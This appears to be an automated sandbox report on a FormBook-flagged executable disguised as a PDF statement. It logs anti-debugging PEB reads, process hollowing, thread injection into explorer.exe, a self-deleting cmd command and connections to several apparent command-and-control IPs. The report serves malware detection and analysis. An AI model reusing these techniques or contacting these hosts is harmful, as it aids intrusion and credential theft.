Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E60A0 mov eax, dword ptr fs:[00000030h]	1_2_340E60A0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A00A5 mov eax, dword ptr fs:[00000030h]	1_2_340A00A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3410F0A5 mov eax, dword ptr fs:[00000030h]	1_2_3410F0A5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411B0AF mov eax, dword ptr fs:[00000030h]	1_2_3411B0AF
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3405B0D6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3405B0D6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3405B0D6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405B0D6 mov eax, dword ptr fs:[00000030h]	1_2_3405B0D6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3407B0D0 mov eax, dword ptr fs:[00000030h]	1_2_3407B0D0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405C0F6 mov eax, dword ptr fs:[00000030h]	1_2_3405C0F6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409D0F0 mov eax, dword ptr fs:[00000030h]	1_2_3409D0F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409D0F0 mov ecx, dword ptr fs:[00000030h]	1_2_3409D0F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340590F8 mov eax, dword ptr fs:[00000030h]	1_2_340590F8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340590F8 mov eax, dword ptr fs:[00000030h]	1_2_340590F8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340590F8 mov eax, dword ptr fs:[00000030h]	1_2_340590F8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340590F8 mov eax, dword ptr fs:[00000030h]	1_2_340590F8
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408510F mov eax, dword ptr fs:[00000030h]	1_2_3408510F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406510D mov eax, dword ptr fs:[00000030h]	1_2_3406510D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34090118 mov eax, dword ptr fs:[00000030h]	1_2_34090118
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405F113 mov eax, dword ptr fs:[00000030h]	1_2_3405F113
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34097128 mov eax, dword ptr fs:[00000030h]	1_2_34097128
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34097128 mov eax, dword ptr fs:[00000030h]	1_2_34097128
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F13E mov eax, dword ptr fs:[00000030h]	1_2_3411F13E
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EA130 mov eax, dword ptr fs:[00000030h]	1_2_340EA130
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405A147 mov eax, dword ptr fs:[00000030h]	1_2_3405A147
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405A147 mov eax, dword ptr fs:[00000030h]	1_2_3405A147
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405A147 mov eax, dword ptr fs:[00000030h]	1_2_3405A147
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34133157 mov eax, dword ptr fs:[00000030h]	1_2_34133157
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34133157 mov eax, dword ptr fs:[00000030h]	1_2_34133157
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34133157 mov eax, dword ptr fs:[00000030h]	1_2_34133157
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F314A mov eax, dword ptr fs:[00000030h]	1_2_340F314A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F314A mov eax, dword ptr fs:[00000030h]	1_2_340F314A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F314A mov eax, dword ptr fs:[00000030h]	1_2_340F314A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340F314A mov eax, dword ptr fs:[00000030h]	1_2_340F314A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409415F mov eax, dword ptr fs:[00000030h]	1_2_3409415F
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34135149 mov eax, dword ptr fs:[00000030h]	1_2_34135149
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409716D mov eax, dword ptr fs:[00000030h]	1_2_3409716D
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340B717A mov eax, dword ptr fs:[00000030h]	1_2_340B717A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340B717A mov eax, dword ptr fs:[00000030h]	1_2_340B717A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34066179 mov eax, dword ptr fs:[00000030h]	1_2_34066179
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34064180 mov eax, dword ptr fs:[00000030h]	1_2_34064180
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34064180 mov eax, dword ptr fs:[00000030h]	1_2_34064180
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34064180 mov eax, dword ptr fs:[00000030h]	1_2_34064180
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1190 mov eax, dword ptr fs:[00000030h]	1_2_340A1190
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340A1190 mov eax, dword ptr fs:[00000030h]	1_2_340A1190
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34089194 mov eax, dword ptr fs:[00000030h]	1_2_34089194
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341351B6 mov eax, dword ptr fs:[00000030h]	1_2_341351B6
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409E1A4 mov eax, dword ptr fs:[00000030h]	1_2_3409E1A4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409E1A4 mov eax, dword ptr fs:[00000030h]	1_2_3409E1A4
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340941BB mov ecx, dword ptr fs:[00000030h]	1_2_340941BB
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340941BB mov eax, dword ptr fs:[00000030h]	1_2_340941BB
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340941BB mov eax, dword ptr fs:[00000030h]	1_2_340941BB
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340931BE mov eax, dword ptr fs:[00000030h]	1_2_340931BE
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340931BE mov eax, dword ptr fs:[00000030h]	1_2_340931BE
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340701C0 mov eax, dword ptr fs:[00000030h]	1_2_340701C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340701C0 mov eax, dword ptr fs:[00000030h]	1_2_340701C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340751C0 mov eax, dword ptr fs:[00000030h]	1_2_340751C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340751C0 mov eax, dword ptr fs:[00000030h]	1_2_340751C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340751C0 mov eax, dword ptr fs:[00000030h]	1_2_340751C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340751C0 mov eax, dword ptr fs:[00000030h]	1_2_340751C0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340691E5 mov eax, dword ptr fs:[00000030h]	1_2_340691E5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340691E5 mov eax, dword ptr fs:[00000030h]	1_2_340691E5
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3406A1E3
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3406A1E3
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3406A1E3
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3406A1E3
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3406A1E3 mov eax, dword ptr fs:[00000030h]	1_2_3406A1E3
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408B1E0 mov eax, dword ptr fs:[00000030h]	1_2_3408B1E0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340581EB mov eax, dword ptr fs:[00000030h]	1_2_340581EB
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340591F0 mov eax, dword ptr fs:[00000030h]	1_2_340591F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340591F0 mov eax, dword ptr fs:[00000030h]	1_2_340591F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340701F1 mov eax, dword ptr fs:[00000030h]	1_2_340701F1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340701F1 mov eax, dword ptr fs:[00000030h]	1_2_340701F1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340701F1 mov eax, dword ptr fs:[00000030h]	1_2_340701F1
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F1F0 mov eax, dword ptr fs:[00000030h]	1_2_3408F1F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F1F0 mov eax, dword ptr fs:[00000030h]	1_2_3408F1F0
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341281EE mov eax, dword ptr fs:[00000030h]	1_2_341281EE
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_341281EE mov eax, dword ptr fs:[00000030h]	1_2_341281EE
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405A200 mov eax, dword ptr fs:[00000030h]	1_2_3405A200
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EB214 mov eax, dword ptr fs:[00000030h]	1_2_340EB214
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340EB214 mov eax, dword ptr fs:[00000030h]	1_2_340EB214
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3405821B mov eax, dword ptr fs:[00000030h]	1_2_3405821B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A22B mov eax, dword ptr fs:[00000030h]	1_2_3409A22B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A22B mov eax, dword ptr fs:[00000030h]	1_2_3409A22B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3409A22B mov eax, dword ptr fs:[00000030h]	1_2_3409A22B
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E0227 mov eax, dword ptr fs:[00000030h]	1_2_340E0227
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E0227 mov eax, dword ptr fs:[00000030h]	1_2_340E0227
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340E0227 mov eax, dword ptr fs:[00000030h]	1_2_340E0227
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_34080230 mov ecx, dword ptr fs:[00000030h]	1_2_34080230
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3408F24A mov eax, dword ptr fs:[00000030h]	1_2_3408F24A
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411F247 mov eax, dword ptr fs:[00000030h]	1_2_3411F247
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DD250 mov eax, dword ptr fs:[00000030h]	1_2_340DD250
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_340DD250 mov ecx, dword ptr fs:[00000030h]	1_2_340DD250
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412124C mov eax, dword ptr fs:[00000030h]	1_2_3412124C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412124C mov eax, dword ptr fs:[00000030h]	1_2_3412124C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412124C mov eax, dword ptr fs:[00000030h]	1_2_3412124C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3412124C mov eax, dword ptr fs:[00000030h]	1_2_3412124C
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 1_2_3411D270 mov eax, dword ptr fs:[00000030h]	1_2_3411D270

Source: C:\Windows\SysWOW64\cmd.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Code function: 0_2_00405A6E CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,

0_2_00405A6E

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.163.115.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.11.56.48 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.154.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.63.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.121.87.199 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.223.253.105 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.149.128.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.246.164.134 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: FF0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\ekstre_pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Thread register set: target process: 4676			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 4676			Jump to behavior

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Process created: C:\Users\user\Desktop\ekstre_pdf.exe C:\Users\user\Desktop\ekstre_pdf.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre_pdf.exe"			Jump to behavior

Source: explorer.exe, 00000002.00000002.7556722676.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2945389020.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000002.7556722676.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.7564856042.00000000042D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2945389020.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.7556722676.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2945389020.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.7556722676.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2945389020.0000000000CC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000002.7553521751.0000000000497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2943488952.0000000000497000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1ProgmanI>

Source: C:\Users\user\Desktop\ekstre_pdf.exe

0_2_0040352D

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	512 Process Injection	1 Masquerading	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	4 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 DLL Side-Loading	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ekstre_pdf.exe	19%	ReversingLabs	Win32.Trojan.Generic
ekstre_pdf.exe	40%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.explorer.exe.114ff840.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.2.cmd.exe.874ae0.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
